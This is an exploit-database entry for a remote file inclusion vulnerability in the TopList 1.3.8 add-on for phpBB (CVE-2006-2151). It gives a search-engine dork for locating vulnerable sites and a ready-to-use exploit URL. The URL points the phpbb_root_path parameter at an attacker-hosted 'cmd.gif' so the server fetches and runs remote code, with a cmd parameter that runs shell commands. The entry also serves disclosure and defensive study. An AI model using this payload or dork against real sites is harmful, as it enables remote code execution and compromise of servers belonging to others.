TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (1)

Author: [Oo]
type: webapps
platform: php
port: 
date_added: 2006-04-26 
date_updated:  
verified: 1 
codes: OSVDB-25260;CVE-2006-2151 
tags: 
aliases:  
screenshot_url:  
application_url: 

Title: TopList Hack for PHPBB <= 1.3.8 Remote File Inclusion
URL: http://www.phpbb2hacks.de/toplist-df148.html
Dork: inurl:"toplist.php" "powered by phpbb"
Credits: [Oo]

Exploit: /toplist.php?f=toplist_top10&phpbb_root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-27]